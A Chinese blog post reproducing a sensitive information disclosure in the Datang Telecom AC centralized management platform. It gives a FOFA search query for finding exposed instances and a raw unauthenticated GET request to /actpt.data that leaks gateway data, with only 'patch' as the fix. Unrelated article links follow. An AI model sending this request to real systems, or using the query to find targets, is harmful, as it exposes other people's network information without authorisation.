首页 > 其他分享 >【漏洞复现】大唐电信AC集中管理平台敏感信息泄漏漏洞

【漏洞复现】大唐电信AC集中管理平台敏感信息泄漏漏洞

时间:2023-11-02 16:24:29浏览次数:50  
标签:AC application image 大唐电信 漏洞 复现 集中管理

免责申明

本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

1、简介

大唐电信科技股份有限公司是电信科学技术研究院(大唐电信科技产业集团)控股的的高科技企业,大唐电信已形成集成电路设计、软件与应用、终端设计、移动互联网四大产业板块。

2、漏洞描述

大唐电信AC集中管理平台存在敏感信息泄漏漏洞。攻击者利用此漏洞可获取大唐电信AC终端管理平台控制的网关敏感信息。

3、受影响版本

暂无

4、FOFA语句

app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="

5、漏洞复现

GET /actpt.data HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

6、Nuclei验证

7、整改建议

打补丁

标签:AC,application,image,大唐电信,漏洞,复现,集中管理
From: https://www.cnblogs.com/fuchangjiang/p/17805680.html

相关文章

  • 【图形学笔记】Lecture12-Path Tracing-路径追踪
    Lecture12-PathTracing-路径追踪目录Lecture12-PathTracing-路径追踪RayCasting光线追踪Ray-surfaceintersection射线-表面判交光线和平面光线和三角形判交——MöllerTrumbore算法RayIntersectionWithSphereRayIntersectionWithImplicitSurfaceBoundingVolumes......
  • MacBook快捷键
    在使用MacBook时,利用键盘快捷键可以大大提高工作效率。以下是一些常用的Mac键盘快捷键:-Command-C:将所选项拷贝到剪贴板。-Command-V:将剪贴板的内容粘贴到当前文稿或应用中。-Command-X:剪切所选项并拷贝到剪贴板。-Command-Z:撤销上一个命令。-Command-A:全选各项。-Command-S......
  • 【宝藏工具】开源组件信息一键查询,快速获取组件来源、版本、源码地址、漏洞补丁、推荐
    铁子们,分享一个开源组件安全检索免费工具,需要的自取~输入组件名,一键查询可以组件版本、来源、安全状态、漏洞详情和推荐版本、修复建议这些。点这个链接注册后直接就能用:组件安全检索工具 一键查询第三方组件版本、漏洞、所属国家、所属语言、源码链接等:查看漏洞详情:......
  • MacBooks打开当前文件夹的cmd终端
    1.打开系统偏好设置,并点击触控板 辅助点击选择点按右下角2.点击左上角访达,选择服务,点击服务偏好设置3.给“新建位于文件夹位置的终端标签页”和“新建位于文件夹位置的终端窗口”钩上选项 这样就可以在你想打开终端的文件夹,使用鼠标右键,打开终端了......
  • fibnacci数列递归实现
    fibnacci数列递归实现1.网上查询资料说明什么是fibnacci数列?Fibonacci数列是一个整数序列,由意大利数学家LeonardoFibonacci在《计算之书》中提出,序列中的数字是前两个数字的和。序列的前几个数字是:0,1,1,2,3,5,8,13,21,34,...。这个序列以0和1开始,之后的每个数字都......
  • acl访问控制列表
    acl访问控制列表作用:抓取信息源,匹配路由,路由策略抓取数据流,数据过滤→默认允许所有-黑名单,数据选路,策略路由分类:基本acl:2000-2999   只能匹配源,适合抓取路由高级acl:3000-3999   可以匹配五元组,更适合抓数据流基于接口:1000-1999基于二层mac地址:4000-4999自定义:acl name ......
  • 前端package文件依赖版本号^符号
    在`package.json`文件中,版本号前面的`^`符号表示允许自动更新到当前主版本号下的次版本号。例如,如果当前主版本号是1,次版本号是0,那么`^1.0.0`将允许安装`1.x.x`范围内的任何版本,但不会安装2.x.x或更高版本的包。......
  • Oracle 列传行UNPIVOT
    语法:UNPIVOT(新列名FOR聚合列名IN(对应的列名1…列名n))INCLUDE|EXCLUDENULLS子句参数可以控制在结果集中是否保留值为NULL的行,默认为EXCLUDENULLS,即去除空值行。--列转换行UNPIVOTSELECT*FROM(SELECTA.*,B.DEPT,B.SECTION,B.LZ,B.LZ_DATEFROMGC_DWT_OA.I......
  • 直播小程序源码,react-native自定义文本输入框
    直播小程序源码,react-native自定义文本输入框Examplesfromprops: ... _onChange=(label,value)=>{  this.setState({[label]:value}); }; render(){  return(   <Viewstyle={styles.container}>    <Text>     {this.stat......
  • .NET6 配置 AutoMapper 与 AutoFac
    AutoMapper 概述1、什么是AutoMapper简单来说,AutoMapper就是一个用C#语言开发的一个轻量的处理一个实体对象到另外一个实体对象映射关系的组件库 官网地址:AutoMapper 文档地址:AutoMapper—AutoMapperdocumentation 2、为什么要用AutoMapper层与层之间的数据转换......